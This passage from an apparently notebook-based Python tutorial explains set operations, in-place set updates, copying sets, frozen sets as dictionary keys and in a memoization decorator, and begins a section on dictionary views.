##### Unions

There are also two ways to calculate the union of two sets:

In [7]:
s1 = {1, 2, 3}
s2 = {3, 4, 5}

In [8]:
s1.union(s2)

{1, 2, 3, 4, 5}

In [9]:
s1 | s2

{1, 2, 3, 4, 5}

We can compute the union of more than two sets:

In [10]:
s3 = {5, 6, 7}

In [11]:
s1.union(s2, s3)

{1, 2, 3, 4, 5, 6, 7}

In [12]:
s1 | s2 | s3

{1, 2, 3, 4, 5, 6, 7}

##### Disjointedness

Two sets are disjoint if their intersection is empty:

In [13]:
s1 = {1, 2, 3}
s2 = {2, 3, 4}
s3 = {30, 40, 50}

In [14]:
print(s1.isdisjoint(s2))
print(s2.isdisjoint(s3))

False
True


Of course we could use the cardinality of the intersection instead:

In [15]:
len(s1 & s2)

2

In [16]:
len(s2 & s3)

0

Or, since empty sets are falsy:

In [17]:
bool(set())

False

In [18]:
bool({0})

True

we can also use the associated truth value:

In [19]:
if {1, 2} & {2, 3}:
    print('sets are not disjoint')

sets are not disjoint


In [20]:
if not {1, 2} & {3, 4}:
    print('sets are disjoint')

sets are disjoint


##### Differences

The difference of two sets can also be computed in two different ways:

In [21]:
s1 = {1, 2, 3, 4, 5}
s2 = {4, 5}

In [22]:
s1 - s2

{1, 2, 3}

In [23]:
s1.difference(s2)

{1, 2, 3}

Of course, with the method we can use iterables as well:

In [24]:
s1.difference([4, 5])

{1, 2, 3}

Note that the difference operator is not commutative, i.e. it does not hold in general that
```
s1 - s2 = s2 - s1
```

In [25]:
s2 - s1

set()

##### Symmetric Difference

We can calculate the symmetric difference of two sets also in two ways:

In [26]:
s1 = {1, 2, 3, 4, 5}
s2 = {4, 5, 6, 7, 8}

In [27]:
s1.symmetric_difference(s2)

{1, 2, 3, 6, 7, 8}

In [28]:
s1 ^ s2

{1, 2, 3, 6, 7, 8}

Remember that the symmetric difference of two sets results in the difference of the union and the intersection of the two sets:

In [29]:
(s1 | s2) - (s1 & s2)

{1, 2, 3, 6, 7, 8}
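
Another way to look at it: the symmetric difference is also the union of the two one-sided differences. A quick sketch comparing the three formulations (the variable names are just for illustration):

```python
s1 = {1, 2, 3, 4, 5}
s2 = {4, 5, 6, 7, 8}

by_operator = s1 ^ s2
by_union_minus_intersection = (s1 | s2) - (s1 & s2)
# elements only in s1, together with elements only in s2
by_two_differences = (s1 - s2) | (s2 - s1)

print(by_operator == by_union_minus_intersection == by_two_differences)
```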

##### Subsets and Supersets

With containment we have the notion of proper containment (i.e. strictly contained, not equal) and just containment (contained, possibly equal).
This is analogous to the concept of `i < j` and `i <= j`.

In [30]:
s1 = {1, 2, 3}
s2 = {1, 2, 3}
s3 = {1, 2, 3, 4}
s4 = {10, 20, 30}

In [31]:
s1.issubset(s2)

True

In [32]:
s1 <= s2

True

For strict containment there is no set method - we have to use the operator, or a combination of methods/operators:

In [33]:
s1 < s2

False

In [34]:
s1.issubset(s2) and s1 != s2

False

In [35]:
s1 < s3

True

In [36]:
s1 <= s4

False

An analogous situation with supersets:

In [37]:
s2.issuperset(s1)

True

In [38]:
s2 >= s1

True

In [39]:
s2 > s1

False

Be careful with these set containment operators, they do not work quite the same way as with numbers for example:

With numbers, if
```
a <= b --> False
```
then it follows that
```
a > b --> True
```

This is not the case with set containment:

In [40]:
s1 = {1, 2, 3}
s2 = {10, 20, 30}

As you can see these two sets are non-empty and disjoint, and containment works as follows:

In [41]:
s1 <= s2

False

In [42]:
s1 > s2

False

In [43]:
s1 < s2

False

In [44]:
s1 >= s2

False

In [45]:
s1 == s2

False

There's really not a whole lot more to say about the various set operations themselves - they are quite easy.
Where they really shine is in their application to diverse problems, especially when dealing with dictionary keys as we saw earlier.

##### Enhanced Set Methods

There's a slight wrinkle to some of these operations we just saw.

When we use the operators (`&`, `|`, `-`, `^`) we have to deal with sets on both sides of the operator:

In [46]:
{1, 2} & [2, 3]

TypeError: unsupported operand type(s) for &: 'set' and 'list'

But when we work with the method equivalent, we do not have that restriction - in fact the argument to these methods can be an iterable in general, not just a set:

In [47]:
{1, 2}.intersection([2, 3])

{2}

What happens is that Python implicitly converts any iterable to a set then finds the intersection.

However, these iterables must contain hashable elements - they need not be unique (they will eventually be made to consist of unique elements):

In [48]:
{1, 2}.intersection([[1,2]])

TypeError: unhashable type: 'list'

This means that when we want to find the intersection of two `lists` for example, we could proceed this way:

In [49]:
l1 = [1, 2, 3]
l2 = [2, 3, 4]

In [50]:
set(l1).intersection(l2)

{2, 3}
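
The same flexibility applies to the other methods we saw, not just `intersection`. Here is a short sketch with a few of them, passing lists, tuples, ranges and strings instead of sets (the variable names are just for illustration):

```python
s = {1, 2, 3}

u = s.union([3, 4], (5,))               # several iterables at once
d = s.difference(range(2, 10))          # removes 2 and 3
sd = s.symmetric_difference([3, 4])     # takes a single iterable
sub = s.issubset(range(10))
sup = s.issuperset([1, 2])
disj = s.isdisjoint('abc')              # characters vs integers

print(u, d, sd)
print(sub, sup, disj)
```

In each case `s` itself is left unchanged, and the methods that build a set return a new one.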

##### Side Note: Why the choice of `&`, `|` , `^` for intersections, unions and symmetric differences?

You might be wondering why Python chose those particular symbols.

Python also uses these operators for bitwise manipulation.

`&` and `|` seem like a perfectly natural fit when you consider that
```
s1 & s2
```
means the elements that belong to `s1` **and** `s2`, 

and
```
s1 | s2
```
means the elements that belong to `s1` **or** `s2`.

Let's look at the bitwise operations, using these two integers:

In [51]:
a = 0b101010
b = 0b110100

In [52]:
a, b

(42, 52)

And these are just two integers, we just chose to create them using a binary literal:

In [53]:
type(a), type(b)

(int, int)

Now consider that `1` means `True`, and `0` means `False`:
* `1 and 0` or `1 & 0` --> `0`
* `1 or 0` or `1 | 0` --> `1`
* and so on

Let's use the bitwise Python and (`&`) operator on those two numbers:

In [54]:
c = a & b
print(c)

32


What we really need to do is look at the representation of this result:

In [55]:
bin(c)

'0b100000'

So this is the result:
```
1 0 1 0 1 0
1 1 0 1 0 0
-----------
1 0 0 0 0 0
```

As you can see we performed a bitwise `and` between the two values. Very similar to asking whether `1` is in the intersection of corresponding slots.

The same happens with `|`, the bitwise `or` operator and unions:

In [56]:
c = a | b

In [57]:
bin(c)

'0b111110'

And again, looking at the bits themselves:
```
1 0 1 0 1 0
1 1 0 1 0 0
-----------
1 1 1 1 1 0
```

This is like asking whether `1` is in the union of corresponding slots.

Now for the symmetric difference.
There is another boolean algebra operation called `xor`, denoted by `^`.
This one works this way:
```
x xor y --> True if x is True or y is True, but not both
```


In [58]:
print(bin(a))
print(bin(b))
print(bin(a^b))

0b101010
0b110100
0b11110


Let's see the bits again:
```
1 0 1 0 1 0
1 1 0 1 0 0
-----------
0 1 1 1 1 0
```

If we make two corresponding slots into sets and find the symmetric difference between the two, what do we get?

In [59]:
{1} ^ {1}

set()

In [60]:
{0} ^ {1}

{0, 1}

In [61]:
{0} ^ {0}

set()

So we can ask if `1` is in `{0} ^ {1}` - which is exactly what the bitwise `xor` (`^`) operator evaluates to in the above example.
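
We can push this analogy a little further. Here is a rough sketch that represents a set of small non-negative integers as a bit mask (bit `i` is `1` if `i` is in the set). The helpers `to_mask` and `from_mask` are made up for this illustration. With that encoding, the bitwise operators on the masks line up exactly with the set operators on the sets. I picked the sets so that the masks are the same `42` and `52` we used above:

```python
def to_mask(s):
    # hypothetical helper: turn on bit i for every integer i in the set
    mask = 0
    for i in s:
        mask |= 1 << i
    return mask

def from_mask(mask):
    # hypothetical helper: the inverse of to_mask
    return {i for i in range(mask.bit_length()) if mask & (1 << i)}

s1 = {1, 3, 5}
s2 = {2, 4, 5}
m1, m2 = to_mask(s1), to_mask(s2)

print(bin(m1), bin(m2))
print(from_mask(m1 & m2) == s1 & s2)
print(from_mask(m1 | m2) == s1 | s2)
print(from_mask(m1 ^ m2) == s1 ^ s2)
```

All three comparisons print `True`.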

##  Update Operations

We can't really update an element of a set - either we remove one or add one - but replacement would not make sense, much like "replacing" a key in a dictionary (we can replace a value, just not a key, and sets are basically like value-less dictionaries).

Let's first consider how we can create new sets from other sets:

* intersection
* union
* difference
* symmetric difference

For each of these cases, we can create new sets as follows:

In [1]:
s1 = {1, 2, 3}
s2 = {2, 3, 4}
print(s1, id(s1))
s1 = s1 & s2
print(s1, id(s1))

{1, 2, 3} 4526218152
{2, 3} 4526218376


As you can see, we calculated the intersection of `s1` and `s2` and set `s1` to the result - but this means we ended up with a new object for `s1`.

We may want to **mutate** `s1` instead.
And the same goes for the other operations mentioned above.

Python provides us a way to do this using both methods and equivalent operators:

* union updates: `s1.update(s2)` or `s1 |= s2`
* intersection updates: `s1.intersection_update(s2)` or `s1 &= s2`
* difference updates: `s1.difference_update(s2)` or `s1 -= s2`
* symm. diff. updates: `s1.symmetric_difference_update(s2)` or `s1 ^= s2`

All these operations **mutate** the original set.
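
Why does the distinction matter? It matters as soon as some other name refers to the same set object. Here is a small sketch (the name `alias` and the other variable names are just for illustration) contrasting rebinding with in-place mutation:

```python
s1 = {1, 2, 3}
s2 = {2, 3, 4}
alias = s1                      # second reference to the same set object

s1 = s1 & s2                    # creates a NEW set and rebinds s1
rebound_same_object = s1 is alias
alias_after_rebinding = set(alias)

s1 = alias                      # point s1 back at the original object
s1 &= s2                        # mutates that object in place
mutated_same_object = s1 is alias
alias_after_mutation = set(alias)

print(rebound_same_object, alias_after_rebinding)
print(mutated_same_object, alias_after_mutation)
```

After the rebinding, `alias` still sees the original elements; after the in-place update, `alias` sees the change, because both names refer to the same object.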

#### Union Updates

In [2]:
s1 = {1, 2, 3}
s2 = {4, 5, 6}
print(id(s1))
s1 |= s2
print(s1, id(s1))

4522075080
{1, 2, 3, 4, 5, 6} 4522075080


In [3]:
s1 = {1, 2, 3}
s2 = {4, 5, 6}
print(id(s1))
s1.update(s2)
print(s1, id(s1))

4526218152
{1, 2, 3, 4, 5, 6} 4526218152


#### Intersection Updates

In [4]:
s1 = {1, 2, 3}
s2 = {2, 3, 4}
print(id(s1))
s1 &= s2
print(s1, id(s1))

4522075080
{2, 3} 4522075080


In [5]:
s1 = {1, 2, 3}
s2 = {2, 3, 4}
print(id(s1))
s1.intersection_update(s2)
print(s1, id(s1))

4526218152
{2, 3} 4526218152


#### Difference Updates

In [6]:
s1 = {1, 2, 3, 4}
s2 = {2, 3}
print(id(s1))
s1 -= s2
print(s1, id(s1))

4526218376
{1, 4} 4526218376


In [7]:
s1 = {1, 2, 3, 4}
s2 = {2, 3}
print(id(s1))
s1.difference_update(s2)
print(s1, id(s1))

4522074856
{1, 4} 4522074856


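Be careful with this one. The next two examples are **NOT** equivalent, because the difference operation is not associative: `s1 - (s2 - s3)` is not the same as `(s1 - s2) - s3`. The operator form `s1 -= s2 - s3` computes the former, while `s1.difference_update(s2, s3)` computes the latter: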

In [8]:
s1 = {1, 2, 3, 4}
s2 = {2, 3}
s3 = {3, 4}
result = s1 - (s2 - s3)
print(result)
s1 -= s2 - s3
print(s1)

{1, 3, 4}
{1, 3, 4}


In [9]:
s1 = {1, 2, 3, 4}
s2 = {2, 3}
s3 = {3, 4}
result = (s1 - s2) - s3
print(result)
s1.difference_update(s2, s3)
print(s1)

{1}
{1}
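If we want the operator form to behave like `difference_update` with several arguments, one option is to subtract the union of the other sets. This is a small sketch using the same values as above (the names `a`, `b` and `c` are just for illustration):

```python
s2 = {2, 3}
s3 = {3, 4}

a = {1, 2, 3, 4}
a.difference_update(s2, s3)   # removes every element of s2 and of s3

b = {1, 2, 3, 4}
b -= s2 | s3                  # same effect using operators

c = {1, 2, 3, 4}
c -= s2 - s3                  # different: only removes elements of s2 that are not in s3

print(a, b, c)
```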


#### Symmetric Difference Update

In [10]:
s1 = {1, 2, 3, 4, 5}
s2 = {4, 5, 6, 7}
s1 ^ s2

{1, 2, 3, 6, 7}

In [11]:
s1 = {1, 2, 3, 4, 5}
s2 = {4, 5, 6, 7}
print(id(s1))
s1 ^= s2
print(s1, id(s1))

4526217704
{1, 2, 3, 6, 7} 4526217704


In [12]:
s1 = {1, 2, 3, 4, 5}
s2 = {4, 5, 6, 7}
print(id(s1))
s1.symmetric_difference_update(s2)
print(s1, id(s1))

4526218824
{1, 2, 3, 6, 7} 4526218824


#### Why the methods as well as the operators?

The methods are actually a bit more flexible than the operators.
What happens when we want to update a set from its union with multiple other sets?
We can certainly do it this way:

In [13]:
s1 = {1, 2, 3}
s2 = {3, 4, 5}
s3 = {5, 6, 7}

In [14]:
print(id(s1))
s1 |= s2 | s3
print(s1, id(s1))

4522074856
{1, 2, 3, 4, 5, 6, 7} 4522074856


So this works quite well, but we **have** to use sets.

The method does not have that restriction: we can pass any iterables (their elements must be hashable), and Python will add their elements to the set without us having to convert them to sets first:

In [15]:
s1 = {1, 2, 3}
s1.update([3, 4, 5], (6, 7, 8), 'abc')
print(s1)

{1, 2, 3, 4, 5, 6, 7, 8, 'a', 'b', 'c'}


Of course we can achieve the same thing using the operators, it just requires a little more typing:

In [16]:
s1 = {1, 2, 3}
s1 |= set([3, 4, 5]) | set((6, 7, 8)) | set('abc')
print(s1)

{1, 2, 3, 4, 5, 6, 7, 8, 'a', 'b', 'c'}
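To see the restriction on the operators directly, here is a short sketch that tries the operator with a list and then falls back to the method (the `error` variable is only there to capture the exception):

```python
s1 = {1, 2, 3}
error = None

try:
    s1 |= [3, 4, 5]        # the operator requires a set (or frozenset) operand
except TypeError as ex:
    error = ex
    print('TypeError:', ex)

s1.update([3, 4, 5])       # the method accepts any iterable of hashable elements
print(s1)
```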


#### Where might this be useful?

You're hopefully seeing a parallel between these set mutation operations and list mutation operations such as `append` and `extend`.

So the usefulness of mutating a set is no different than the usefulness of mutating a list.

There might be a reason you want to maintain the same object reference - maybe you are writing a function that needs to mutate some set that was passed as an argument.

##### Example 1

Suppose you are writing a function that needs to return all the words found in multiple strings, but with certain words removed (like `'the'`, `'and'`, etc).

You could take this approach:

In [17]:
def combine(string, target):
    target.update(string.split(' '))

In [18]:
def cleanup(combined):
    words = {'the', 'and', 'a', 'or', 'is', 'of'}
    combined -= words

In [19]:
result = set()
combine('lumberjacks sleep all night', result)
combine('the mistry of silly walks', result)
combine('this parrot is a late parrot', result)
cleanup(result)
print(result)

{'parrot', 'this', 'walks', 'mistry', 'late', 'lumberjacks', 'night', 'silly', 'sleep', 'all'}


##### Example 2

You may find the above example a little contrived, so let's see another example which might actually prove more practical.

Suppose we have a program that fetches data from some API, database, whatever - and it retrieves a paged list of city names. We want our program to keep fetching data from the source until the source is exhausted, and filter out any cities we are not interested in from our final result.

To simulate the data source, let's do this:

In [20]:
def gen_read_data():
    yield ['Paris', 'Beijing', 'New York', 'London', 'Madrid', 'Mumbai']
    yield ['Hyderabad', 'New York', 'Milan', 'Phoenix', 'Berlin', 'Cairo']
    yield ['Stockholm', 'Cairo', 'Paris', 'Barcelona', 'San Francisco']

And we can use this generator this way:

In [21]:
data = gen_read_data()

In [22]:
next(data)

['Paris', 'Beijing', 'New York', 'London', 'Madrid', 'Mumbai']

In [23]:
next(data)

['Hyderabad', 'New York', 'Milan', 'Phoenix', 'Berlin', 'Cairo']

In [24]:
next(data)

['Stockholm', 'Cairo', 'Paris', 'Barcelona', 'San Francisco']

In [25]:
next(data)

StopIteration: 

Next we're going to create a filter that will look at the data just received, removing any cities that match one we want to ignore:

In [26]:
def filter_incoming(*cities, data_set):
    data_set.difference_update(cities)

In [27]:
result = set()
data = gen_read_data()
for page in data:
    result.update(page)
    filter_incoming('Paris', 'London', data_set=result)
print(result)

{'Hyderabad', 'New York', 'Phoenix', 'San Francisco', 'Barcelona', 'Mumbai', 'Stockholm', 'Cairo', 'Madrid', 'Milan', 'Beijing', 'Berlin'}


##  Copying Sets

Just as with other container types, we need to differentiate between shallow copies and deep copies.

Python sets implement a `copy` method that creates a shallow copy of the set. And, just as with lists, tuples, dictionaries, etc, we can also use unpacking to shallow copy sets. We can also just use the `set()` function to shallow copy one set into another.

Deep copies of sets can be done using the `deepcopy` function in the `copy` module.

The concepts and techniques are not new, so I won't spend much time on them.

#### Shallow Copies using the `copy` method

To illustrate the shallow copy vs deepcopy issues, we'll create our own mutable, but hashable type:

In [1]:
class Person:
    def __init__(self, name):
        self.name = name
    
    def __repr__(self):
        return f'Person(name={self.name})'

In [2]:
p1 = Person('John')
p2 = Person('Eric')

In [3]:
s1 = {p1, p2}

In [4]:
s1

{Person(name=Eric), Person(name=John)}

Now let's make a shallow copy:

In [5]:
s2 = s1.copy()

In [6]:
s1 is s2

False

As we can see the sets are not the same, however their contained elements **are**:

In [7]:
p1.name = 'John Cleese'

In [8]:
s1

{Person(name=Eric), Person(name=John Cleese)}

In [9]:
s2

{Person(name=Eric), Person(name=John Cleese)}

#### Shallow copies using unpacking

We can also use unpacking, just as with iterable unpacking, to unpack one set into another:

In [10]:
s3 = {*s2}

In [11]:
s3 is s2

False

In [12]:
s3

{Person(name=Eric), Person(name=John Cleese)}

In [13]:
p2.name = 'Eric Idle'

In [14]:
print(s1)
print(s2)
print(s3)

{Person(name=John Cleese), Person(name=Eric Idle)}
{Person(name=John Cleese), Person(name=Eric Idle)}
{Person(name=John Cleese), Person(name=Eric Idle)}


#### Shallow copies using the `set()` function

In [15]:
s4 = set(s1)

In [16]:
s4 is s1

False

In [17]:
s4

{Person(name=Eric Idle), Person(name=John Cleese)}

In [18]:
p1.name = 'Michael Palin'

In [19]:
print(s1)
print(s2)
print(s3)
print(s4)

{Person(name=Michael Palin), Person(name=Eric Idle)}
{Person(name=Michael Palin), Person(name=Eric Idle)}
{Person(name=Michael Palin), Person(name=Eric Idle)}
{Person(name=Michael Palin), Person(name=Eric Idle)}


#### Deep Copies

In [20]:
from copy import deepcopy

In [21]:
s5 = deepcopy(s1)

In [22]:
s1 is s5

False

In [23]:
s1

{Person(name=Eric Idle), Person(name=Michael Palin)}

In [24]:
s5

{Person(name=Eric Idle), Person(name=Michael Palin)}

In [25]:
p1.name = 'Terry Jones'

In [26]:
print(s1)
print(s2)
print(s3)
print(s4)
print(s5)

{Person(name=Terry Jones), Person(name=Eric Idle)}
{Person(name=Terry Jones), Person(name=Eric Idle)}
{Person(name=Terry Jones), Person(name=Eric Idle)}
{Person(name=Terry Jones), Person(name=Eric Idle)}
{Person(name=Eric Idle), Person(name=Michael Palin)}


As you can see, the deep copy also made (deep) copies of each element in the set being (deep) copied.
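We can also check this directly by comparing object identities. The sketch below uses a stripped-down `Person` class (no custom `__eq__` or `__hash__`, so equality and hashing fall back to object identity):

```python
from copy import deepcopy

class Person:
    def __init__(self, name):
        self.name = name

p = Person('John')
original = {p}
shallow = original.copy()
deep = deepcopy(original)

shallow_elem = next(iter(shallow))
deep_elem = next(iter(deep))

print(shallow_elem is p)    # the shallow copy holds the very same object
print(deep_elem is p)       # the deep copy holds a new Person object
print(p in deep)            # membership uses the identity-based hash and equality
```

One consequence worth noting: with identity-based hashing, the original `p` is not considered a member of the deep copy, even though the copied element has the same name.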

##  Frozen Sets

`frozenset` is the **immutable** equivalent of the plain `set`.

Apart from the fact that you cannot mutate the collection (i.e. add or remove elements), the interesting thing is that frozen sets are hashable (as long as each contained element is also hashable).

This means that whereas we cannot create a set of sets, we can create a set of frozen sets (or a frozen set of frozen sets). It also means that we can use frozen sets as dictionary keys.

There is no literal for frozen sets - we have to use the `frozenset()` callable. It is used the same way to create frozensets that `set()` would be used to create sets.

In [1]:
s1 = {'a', 'b', 'c'}

In [2]:
hash(s1)

TypeError: unhashable type: 'set'

In [3]:
s2 = frozenset(['a', 'b', 'c'])

In [4]:
hash(s2)

-2484440409846998240

And we can create a set of frozen sets:

In [5]:
s3 = {frozenset({'a', 'b'}), frozenset([1, 2, 3])}

In [6]:
s3

{frozenset({1, 2, 3}), frozenset({'a', 'b'})}
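As a quick contrast, here is a sketch showing that the same literal built from plain sets fails, while frozen sets work both as set elements and as dictionary keys (the names `nested`, `groups` and `labels` are illustrative):

```python
try:
    nested = {{1, 2}, {3, 4}}          # plain sets are unhashable
except TypeError as ex:
    nested = None
    print('TypeError:', ex)

groups = {frozenset({1, 2}), frozenset({3, 4})}
print(frozenset({2, 1}) in groups)     # membership does not depend on element order

labels = {frozenset({'a', 'b'}): 'first pair'}
print(labels[frozenset({'b', 'a'})])
```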

#### Copying Frozen Sets

Remember what happens when we create a shallow copy of a tuple using the `tuple()` callable?

In [7]:
t1 = (1, 2, [3, 4])

In [8]:
t2 = tuple(t1)

In [9]:
t1 is t2

True

This is quite different from what happens with a list:

In [10]:
l1 = [1, 2, [3, 4]]
l2 = list(l1)

In [11]:
l1 is l2

False

Remember that there's really no point in making a shallow copy of an immutable container - so, Python optimizes this for us and just returns the original tuple. Of course, lists are mutable, and that optimization cannot happen.

The same thing happens with sets and frozen sets:

In [12]:
s1 = {1, 2, 3}
s2 = set(s1)
s1 is s2

False

In [13]:
s1 = frozenset([1, 2, 3])
s2 = frozenset(s1)
print(type(s1), type(s2), s1 is s2)

<class 'frozenset'> <class 'frozenset'> True


Same goes with the `copy()` method:

In [14]:
s2 = s1.copy()
print(type(s1), type(s2), s1 is s2)

<class 'frozenset'> <class 'frozenset'> True


Of course, this will not happen with a deep copy in general:

In [15]:
from copy import deepcopy

In [16]:
s2 = deepcopy(s1)
print(type(s1), type(s2), s1 is s2)

<class 'frozenset'> <class 'frozenset'> False


#### Set Operations

All the non-mutating set operations we studied with sets also apply to frozen sets.

But, in addition, we can mix sets and frozen sets when performing these operations.

For example:

In [17]:
s1 = frozenset({'a', 'b'})
s2 = {1, 2}
s3 = s1 | s2

In [18]:
s3

frozenset({1, 2, 'a', 'b'})

What's important to note here is the data type of the result - it is a frozen set.
Let's do this operation again, but switch around `s1` and `s2`:

In [19]:
s3 = s2 | s1

In [20]:
s3

{1, 2, 'a', 'b'}

As you can see, the result is now a standard set.

Basically the data type of the first operand determines the data type of the result.

In [21]:
s1 = frozenset({'a', 'b', 'c'})
s2 = {'c', 'd', 'e'}

In [22]:
s1 & s2

frozenset({'c'})

In [23]:
s2 & s1

{'c'}

Same goes with differences and symmetric differences:

In [24]:
s1 - s2

frozenset({'a', 'b'})

In [25]:
s2 - s1

{'d', 'e'}

In [26]:
s1 ^ s2

frozenset({'a', 'b', 'd', 'e'})

In [27]:
s2 ^ s1

{'a', 'b', 'd', 'e'}
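The rule about the first operand can be checked for all four operators at once. This is a small sketch that uses the functions in the standard `operator` module to apply each operator in both orders and record the result types:

```python
import operator

fs = frozenset({'a', 'b', 'c'})
s = {'c', 'd', 'e'}

result_types = {}
for name, op in [('|', operator.or_), ('&', operator.and_),
                 ('-', operator.sub), ('^', operator.xor)]:
    # record the result type for each operand order
    result_types[name] = (type(op(fs, s)), type(op(s, fs)))
    print(name, result_types[name])
```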

What about equality?

In [28]:
s1 = {1, 2}
s2 = frozenset(s1)

In [29]:
s1 is s2

False

In [30]:
s1 == s2

True

As you can see, this is very similar behavior to numerical values:

In [31]:
1 == 1.0

True

In [32]:
1 == 1 + 0j

True

Even though they are not the same data type (and hence cannot possibly be the same object), equality still works "as expected".

##### Application 1

One application of frozen sets, given that they are hashable, is as keys for a dictionary.

Recall an example we worked on in the past where we wanted a `Person` object to be used as a key in a dictionary.

We had to define the class, equality and the hash - that was quite a bit of work for what amounted to, in the end just checking that the name and age were the same.

Of course, we may have more complex instances of this, but for a simple case like that, especially if we consider our `Person` class to be immutable, it would have been easier to just use a frozen set containing the name and age:

In [33]:
class Person:
    def __init__(self, name, age):
        self._name = name
        self._age = age
        
    def __repr__(self):
        return f'Person(name={self._name}, age={self._age})'
    
    @property
    def name(self):
        return self._name
        
    @property
    def age(self):
        return self._age
    
    def key(self):
        return frozenset({self.name, self.age})

In [34]:
p1 = Person('John', 78)
p2 = Person('Eric', 75)

In [35]:
d = {p1.key(): p1, p2.key(): p2}

In [36]:
d

{frozenset({78, 'John'}): Person(name=John, age=78),
 frozenset({75, 'Eric'}): Person(name=Eric, age=75)}

And we can easily lookup using those keys now:

In [37]:
d[frozenset({'John', 78})]

Person(name=John, age=78)

In [38]:
d[frozenset({78, 'John'})]

Person(name=John, age=78)

Of course this is a rather limited use case, but if you ever need to use sets as dictionary keys, you can do so with frozen sets (as long as all the elements are hashable).
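One thing to keep in mind with frozen set keys is that a frozen set does not remember which element came from which field. That is harmless when the fields have different types (a string name and an integer age), but it matters when they could hold interchangeable values. The sketch below uses hypothetical two-field records (first name, last name) that are not part of the example above, and compares frozen set keys with tuple keys:

```python
# Hypothetical records with two string fields: (first, last)
rec1 = ('Terry', 'Jones')
rec2 = ('Jones', 'Terry')       # a different record, fields swapped

fs_key1, fs_key2 = frozenset(rec1), frozenset(rec2)
print(fs_key1 == fs_key2)       # frozen set keys cannot tell the records apart

by_tuple = {rec1: 'record 1', rec2: 'record 2'}
by_frozenset = {fs_key1: 'record 1', fs_key2: 'record 2'}
print(len(by_tuple), len(by_frozenset))
```

So a frozen set key is a good fit when the order of the components genuinely does not matter; when it does, a tuple is the more natural key.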

##### Application 2

A slightly more interesting application of this is memoization. I cover memoization in detail in Part 1 of this series in the section on decorators.

Recall that memoization is basically a technique to cache the results of a (deterministic) function call based on the provided arguments. A cache is created that contains the results of calling the function with a particular set of arguments. The next time the function is called, the arguments are checked against the cache: if they exist in the cache, the cached value is returned instead of re-executing the function.

Although Python's `functools` has the `lru_cache` decorator available, there is one drawback - the order of the keyword arguments matters.

Let's see this:

In [39]:
from functools import lru_cache

In [40]:
@lru_cache()
def my_func(*, a, b):
    print('calculating a+b...')
    return a + b

In [41]:
my_func(a=1, b=2)

calculating a+b...


3

In [42]:
my_func(a=1, b=2)

3

Notice how the second time around, we did not see `calculating a+b...` printed out - that's because the value was pulled from cache.

But now look at this:

In [43]:
my_func(b=2, a=1)

calculating a+b...


3

Even though the values are technically the same, the order in which we specified them was different, and the cache considered the arguments to be different. Now of course, both "styles" are cached:

In [44]:
my_func(a=1, b=2)
my_func(b=2, a=1)

3
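We can confirm what the cache is doing with the `cache_info()` method that `lru_cache` adds to the decorated function. This is a minimal sketch using a separate function (named `add` here only to avoid clobbering `my_func`); it relies on the CPython behavior demonstrated above, where a different keyword order produces a separate cache entry:

```python
from functools import lru_cache

@lru_cache()
def add(*, a, b):
    return a + b

add(a=1, b=2)       # miss: first call
add(a=1, b=2)       # hit: same keywords in the same order
add(b=2, a=1)       # treated as a new entry: different keyword order
info = add.cache_info()
print(info)
```

The hit and miss counters, along with the current cache size, show that the two keyword orderings ended up as two separate entries.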

An interesting side note, now that we know all about hashability!
You'll notice that the way `my_func` works we can actually pass in other data types than just numbers. We could use strings, tuples, even lists:

In [45]:
my_func(a='abc', b='def')

calculating a+b...


'abcdef'

In [46]:
my_func(a='abc', b='def')

'abcdef'

As you can see caching works just fine.
But what is being used to back the cache for `lru_cache`? A dictionary...
And what do we know about dictionary keys? They must be hashable!

So this will actually fail, and not because the function can't handle it, but because the `lru_cache` mechanism cannot:

In [47]:
my_func(a=[1, 2, 3], b=[4, 5, 6])

TypeError: unhashable type: 'list'

Let's write our own version of this.
We'll use a dictionary to cache the results - so we'll need to come up with a key representing the arguments - and one in which the order of the keyword-only arguments does not matter. We'll have the same limitation in terms of hashable keys as `lru_cache`, but at least we won't have the argument ordering issue:

In [48]:
def memoizer(fn):
    cache = {}
    def inner(*args, **kwargs):
        key = (*args, frozenset(kwargs.items()))
        if key in cache:
            return cache[key]
        else:
            result = fn(*args, **kwargs)
            cache[key] = result
            return result
    return inner

In [49]:
@memoizer
def my_func(*, a, b):
    print('calculating a+b...')
    return a + b

In [50]:
my_func(a=1, b=2)

calculating a+b...


3

In [51]:
my_func(a=1, b=2)

3

So far so good... Now let's swap the arguments around:

In [52]:
my_func(b=2, a=1)

3

Yay!! It used the cache!

We can even tweak this to effectively provide more efficient caching when the order of positional arguments is not important either:

In [53]:
def memoizer(fn):
    cache = {}
    def inner(*args, **kwargs):
        key = frozenset(args) | frozenset(kwargs.items())
        if key in cache:
            return cache[key]
        else:
            result = fn(*args, **kwargs)
            cache[key] = result
            return result
    return inner

In [54]:
@memoizer
def adder(*args):
    print('calculating...')
    return sum(args)

In [55]:
adder(1, 2, 3)

calculating...


6

In [56]:
adder(3, 2, 1)

6

In [57]:
adder(2, 1, 3)

6

In [58]:
adder(1, 2, 3, 4)

calculating...


10

In [59]:
adder(4, 2, 1, 3)

10

Isn't Python fun!!
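One caveat with building the key from `frozenset(args)`: a frozen set discards duplicates, so `adder(1, 1, 2)` and `adder(1, 2)` would share a cache key even though their sums differ. A possible way around this, sketched below as one option rather than the definitive approach, is to key on how many times each positional argument occurs, using `collections.Counter`. The `calls` list is only there to record which calls were actually computed:

```python
from collections import Counter

def memoizer(fn):
    cache = {}
    def inner(*args, **kwargs):
        # Counter(args).items() pairs each value with how often it occurs,
        # so (1, 1, 2) and (1, 2) produce different keys
        key = (frozenset(Counter(args).items()), frozenset(kwargs.items()))
        if key not in cache:
            cache[key] = fn(*args, **kwargs)
        return cache[key]
    return inner

calls = []

@memoizer
def adder(*args):
    calls.append(args)      # record every real computation
    return sum(args)

print(adder(1, 2), adder(1, 1, 2), adder(2, 1, 1))
print(calls)
```

The order of the positional arguments still does not matter, but repeated values are now taken into account.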

##  Views: Keys, Values and Items

#### Views are not Static

These view objects are not static - so it's not like Python makes a copy of the keys, values or items, and uses these static copies. They are like windows (views) into the **current** state of the dictionary. If the dictionary changes, then these views reflect those changes immediately.

Basically these views provide methods that access the underlying dictionary. They do not "own" any data.

In [1]:
d = {'a': 1, 'b': 2}

In [2]:
keys = d.keys()
values = d.values()
items = d.items()

In [3]:
print(id(keys), id(values), id(items))

4347984680 4347985016 4347985064


In [4]:
print(keys)
print(values)
print(items)

dict_keys(['a', 'b'])
dict_values([1, 2])
dict_items([('a', 1), ('b', 2)])


In [5]:
d['z'] = 100

In [6]:
print(id(keys), id(values), id(items))

4347984680 4347985016 4347985064


As you can see the memory address of these view objects has not changed:

In [7]:
print(keys)
print(values)
print(items)

